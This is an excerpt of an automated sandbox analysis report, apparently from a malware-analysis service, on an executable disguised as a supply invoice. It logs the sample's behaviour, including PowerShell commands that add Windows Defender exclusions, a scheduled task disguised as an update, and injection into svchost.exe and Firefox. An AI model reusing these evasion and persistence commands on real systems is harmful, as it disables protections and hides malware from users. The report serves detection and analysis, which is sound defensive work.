            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C5ED mov eax, dword ptr fs:[00000030h]11_2_0173C5ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C5ED mov eax, dword ptr fs:[00000030h]11_2_0173C5ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017065D0 mov eax, dword ptr fs:[00000030h]11_2_017065D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A5D0 mov eax, dword ptr fs:[00000030h]11_2_0173A5D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A5D0 mov eax, dword ptr fs:[00000030h]11_2_0173A5D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E5CF mov eax, dword ptr fs:[00000030h]11_2_0173E5CF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E5CF mov eax, dword ptr fs:[00000030h]11_2_0173E5CF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017245B1 mov eax, dword ptr fs:[00000030h]11_2_017245B1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017245B1 mov eax, dword ptr fs:[00000030h]11_2_017245B1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E59C mov eax, dword ptr fs:[00000030h]11_2_0173E59C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702582 mov eax, dword ptr fs:[00000030h]11_2_01702582
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702582 mov ecx, dword ptr fs:[00000030h]11_2_01702582
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01734588 mov eax, dword ptr fs:[00000030h]11_2_01734588
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C460 mov ecx, dword ptr fs:[00000030h]11_2_0178C460
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172245A mov eax, dword ptr fs:[00000030h]11_2_0172245A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA456 mov eax, dword ptr fs:[00000030h]11_2_017BA456
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F645D mov eax, dword ptr fs:[00000030h]11_2_016F645D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A430 mov eax, dword ptr fs:[00000030h]11_2_0173A430
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC427 mov eax, dword ptr fs:[00000030h]11_2_016FC427
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017004E5 mov ecx, dword ptr fs:[00000030h]11_2_017004E5
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017344B0 mov ecx, dword ptr fs:[00000030h]11_2_017344B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178A4B0 mov eax, dword ptr fs:[00000030h]11_2_0178A4B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017064AB mov eax, dword ptr fs:[00000030h]11_2_017064AB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA49A mov eax, dword ptr fs:[00000030h]11_2_017BA49A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708770 mov eax, dword ptr fs:[00000030h]11_2_01708770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700750 mov eax, dword ptr fs:[00000030h]11_2_01700750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742750 mov eax, dword ptr fs:[00000030h]11_2_01742750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742750 mov eax, dword ptr fs:[00000030h]11_2_01742750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E75D mov eax, dword ptr fs:[00000030h]11_2_0178E75D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01784755 mov eax, dword ptr fs:[00000030h]11_2_01784755
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov esi, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov eax, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov eax, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177C730 mov eax, dword ptr fs:[00000030h]11_2_0177C730
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov eax, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov ecx, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov eax, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C720 mov eax, dword ptr fs:[00000030h]11_2_0173C720
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C720 mov eax, dword ptr fs:[00000030h]11_2_0173C720
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700710 mov eax, dword ptr fs:[00000030h]11_2_01700710
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01730710 mov eax, dword ptr fs:[00000030h]11_2_01730710
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C700 mov eax, dword ptr fs:[00000030h]11_2_0173C700
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017047FB mov eax, dword ptr fs:[00000030h]11_2_017047FB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017047FB mov eax, dword ptr fs:[00000030h]11_2_017047FB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E7E1 mov eax, dword ptr fs:[00000030h]11_2_0178E7E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170C7C0 mov eax, dword ptr fs:[00000030h]11_2_0170C7C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017807C3 mov eax, dword ptr fs:[00000030h]11_2_017807C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B47A0 mov eax, dword ptr fs:[00000030h]11_2_017B47A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017007AF mov eax, dword ptr fs:[00000030h]11_2_017007AF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A678E mov eax, dword ptr fs:[00000030h]11_2_017A678E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01732674 mov eax, dword ptr fs:[00000030h]11_2_01732674
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C866E mov eax, dword ptr fs:[00000030h]11_2_017C866E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C866E mov eax, dword ptr fs:[00000030h]11_2_017C866E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A660 mov eax, dword ptr fs:[00000030h]11_2_0173A660
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A660 mov eax, dword ptr fs:[00000030h]11_2_0173A660
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171C640 mov eax, dword ptr fs:[00000030h]11_2_0171C640
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe NtTerminateThread: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Section loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3048
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4577482168.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000000.2216481367.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
